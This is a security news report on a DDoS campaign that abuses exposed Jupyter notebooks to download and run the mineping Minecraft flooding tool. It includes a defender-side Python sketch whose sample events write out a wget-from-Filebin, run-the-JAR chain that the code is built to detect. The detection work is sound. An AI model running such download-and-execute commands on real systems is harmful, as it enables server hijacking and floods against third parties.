Cybersecurity researchers have revealed details of a new distributed denial-of-service (DDoS) attack campaign targeting misconfigured Jupyter notebooks.
Codenamed Panomorphic by cloud security company Aqua, the activity uses a Java-based tool called mineping to launch a TCP flood DDoS attack. Mineping is a DDoS package designed for Minecraft game servers.
The attack chains involve using Jupyter Notebook instances exposed on the Internet to execute wget commands to retrieve a ZIP archive hosted on a file sharing site called Filebin.
The ZIP file contains two Java archive (JAR) files, conn.jar and mineping.jar. The former is used to establish a connection to a Discord channel and to start the mineping.jar package.
“This attack aims to consume the target server’s resources by sending a large number of TCP connection requests,” Aqua researcher Assaf Morag said. “Results are posted to the Discord channel.”
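A defender-side sketch of how the chain described above could be flagged in process-execution telemetry, added here as an example and not taken from Aqua's report: it correlates a wget download from a Filebin URL with execution of conn.jar or mineping.jar on the same host. The event format, the hostnames and the `filebin.example` URL are constructed assumptions.

```python
import re
import shlex

# Constructed (host, command line) process events; hosts, paths and the
# filebin.example URL are placeholders, not values from the report.
SAMPLE_EVENTS = [
    ("nb-01", "wget https://filebin.example/BIN-ID/files.zip -O /tmp/files.zip"),
    ("nb-01", "unzip /tmp/files.zip -d /tmp/f"),
    ("nb-01", "java -jar /tmp/f/conn.jar"),
    ("nb-01", "java -jar mineping.jar"),
    ("nb-02", "wget https://pypi.org/simple/requests/"),
    ("nb-03", "java -jar /opt/app/server.jar"),
    ("nb-04", "/usr/bin/java -Xmx1g -jar ./MinePing.jar"),
]

JAR_NAMES = {"conn.jar", "mineping.jar"}  # JAR names given in the article
# Assumption: the file-sharing host name contains "filebin".
FILEBIN_URL = re.compile(r"https?://[^/\s]*filebin[^/\s]*/", re.I)

def classify(cmdline):
    """Return the stage of the described chain a command matches, or None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        argv = cmdline.split()
    if not argv:
        return None
    tool = argv[0].rsplit("/", 1)[-1]
    if tool == "wget" and any(FILEBIN_URL.match(a) for a in argv[1:]):
        return "download"
    if tool == "java" and "-jar" in argv[:-1]:
        jar = argv[argv.index("-jar") + 1]
        if jar.rsplit("/", 1)[-1].lower() in JAR_NAMES:
            return "jar_exec"
    return None

def detect(events):
    """Map host -> 'high' when a download precedes JAR execution, else 'medium'."""
    seen, verdict = {}, {}
    for host, cmdline in events:
        stage = classify(cmdline)
        if stage is None:
            continue
        seen.setdefault(host, []).append(stage)
        if stage == "jar_exec" and "download" in seen[host]:
            verdict[host] = "high"
        else:
            verdict.setdefault(host, "medium")
    return verdict
```

Hosts that show only one of the two indicators are reported as `medium` so that an analyst can review them without treating a lone match as a confirmed compromise.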
The attack campaign is attributed to a threat actor whose GitHub account has a public repository containing a Minecraft server properties file.
This is not the first time that Internet-accessible Jupyter notebooks have been targeted by adversaries. In October 2023, a Tunisian threat actor dubbed Cubitstrike was spotted breaching Jupyter Notebooks in an attempt to illegally mine cryptocurrency and compromise cloud environments.